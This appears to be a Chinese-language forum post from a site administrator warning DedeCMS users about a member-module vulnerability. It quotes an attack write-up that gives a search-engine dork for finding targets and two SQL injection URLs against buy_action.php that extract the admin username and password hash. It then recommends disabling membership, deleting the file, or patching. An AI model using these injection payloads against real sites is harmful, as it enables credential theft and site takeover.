txfzq
管理员
积分 33428
发帖 13147
注册 2005-5-26
状态 离线
|
#1 所有使用dedecms的兄弟们注意了
今天在baidu搜到一个关于dedecms漏洞的文章,描述如下
Quote: | Power by DedeCms漏洞,都去拿SHELL把!
首先在
GOOGLE搜Power by DedeCms
漏洞现象:注册地址:
/member/index_do.php?fmdo=user&dopost=regnew
爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/* |
|
建议用dedecms做站的弟兄们,在后台关闭会员功能并删除
buy_action.php文件,或者下载dedecms最新补丁
DedeCms 4.x 会员中心补丁
http://bbs.dedecms.com/read.php?tid=11338
|
|
|